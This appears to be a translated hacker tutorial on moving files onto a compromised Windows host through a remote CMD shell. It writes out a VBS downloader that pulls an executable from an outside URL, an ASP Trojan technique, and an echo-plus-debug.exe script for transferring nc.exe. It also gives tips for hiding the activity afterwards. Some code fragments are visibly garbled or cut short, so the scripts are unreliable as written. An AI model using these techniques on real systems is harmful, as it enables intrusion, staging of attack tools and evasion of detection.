CMD for overflow vulnerability Shell, the biggest problem is how to upload files. Due to the prevalence of worms, the 139 or 445 ports needed to connect IPC $are blocked. In addition, WinXP system strengthens the protection of IPC $, and the method of uploading files through IPC $and default sharing is basically invalid. FTP and TFTP are two feasible methods. Since they are well known, this paper will not introduce them. There are also three methods that you are familiar with. To sum up, I would like to mention them again
1. Write asp Trojan with echo command.
The premise, of course, is that IIS is already installed on the target host.
General ASP Trojan “volume” is large, not suitable for direct use of echo command to write files, here I provide a compact.
The echo version is given directly
@echo ^ >up.asp
Notice that there’s only one line with no carriage return in the middle.
The generated up.asp can not be accessed by browser, only the following script can be used:
@echo w.open “get”,.arguments(0),0:w.send:if w.status^>200 then .echo “Error:”+w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs
For example, Download ps.exe and save it to C: path
cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
Note that this is done in the remote shell.
4. Any encoded file of echo is restored by script + debug.
Neither of the previous two methods can guarantee to pass through the firewall. Besides, unless you set up your own web server, general web resources are provided in the form of compressed files. If the target host does not have a decompression tool, there is no way. Well, it’s just a “trump card”!
The echo command can write characters whose ASCII code is less than 128, but not characters whose ASCII code is greater than or equal to 128. Only when the local file is recoded to a character that can be displayed, can it be written to the remote host conveniently. The first thing you can think of is Base64 encoding, which is the encoding method of email attachment. However, VBS does not support bit x, so the encoding and decoding are more complex. What’s more, the script’s ability to process files as binary streams is poor（ Adodb.stream can write files in stream mode, but I can’t construct the corresponding data type. Binary data stream can be converted into string by using MIDB function, but not vice versa. It took me two days to solve the problem. If anyone can use VBS or JS to write any byte data to a file, please give me your advice.)
But only debug.exe. Many people know the principle. I will not introduce it. I will give the result directly – Coding script:
sll=sl mod 65536:slh=sl\65536
.write “@echo str=”””
for i=1 to sl
if bt>debug.vbs”+vbcrlf+”@echo +”””
.writeline “””>>debug.vbs”+vbcrlf+”@echo with wscript.stdout:r=vbcrlf”_
+”:for i=1 to len(str) step 48:.write “”e””+hex(256+(i-1)/2)”_
+”:for j=i to i+46 step 2:.write “” “”+mid(str,j,2):next:.write r:next>>debug.vbs”
.writeline “@echo .write “”rbx””+r+”””+hex(slh)+”””+r+””rcx””+r+”””+hex(sll)_
+”””+r+””n debug.tmp””+r+””w””+r+””q””+r:end with”_
+”>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp “””&fn&”””&del debug.vbs”
Save it as echo.vbs. Suppose you want to upload nc.exe, then enter the command on the local command line:
cscript echo.vbs nc.exe
You can also drag and drop the icon of the file to be transferred to the icon of the script file.
Wait a moment, an nc.exe.bat will be generated in the current directory. Open it with notepad and other editing tools, and you can see the following:
… (omit lines)
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write “e”+hex(256+(i-1)/2):for j=i to i+46 step 2:.write ” “+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write “rbx”+r+”0″+r+”rcx”+r+”E800″+r+”n debug.tmp”+r+”w”+r+”q”+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp “NC.EXE”&del debug.vbs
Select all －》 copy －》 Switch to the remote command line window －》 Paste.
If the network speed is not very slow, the whole upload process will take about 20 seconds.
1. The large file transfer is unstable, which may cause the shell to die. So the smaller the file, the better. It is suggested that the original file should not exceed 100kb.
2. Before transferring large files, you can transfer a small file as a “warm-up” to let the 16 bit virtual machine ntvdm.exe reside in the background. After all files are transferred, for the sake of concealment, the ntvdm process should be killed.
3. Some CMD Each shell command needs to attach two carriage returns, so nc.exe.bat can’t be used directly.
4. The length of a single command is limited, so we can’t complete all tasks with only one echo. Moreover, for the CMD provided by NC Shell, a slightly longer command will make the shell exit automatically (overflow?). You can change “I” mod 128 = 0 “statement to adjust the length of each echo command. The character of each echo is multiplied by 2.
5. It is OK to decode without script. The purpose of using scripts is to reduce the amount of data transferred (because the data is compressed). If I have time, I will write a more perfect script to strengthen the data compression ability and increase the data verification function.
It’s easy to upload files, of course, but a lot of windows tools are more convenient. As you go around looking for the tools you need, don’t forget windows itself.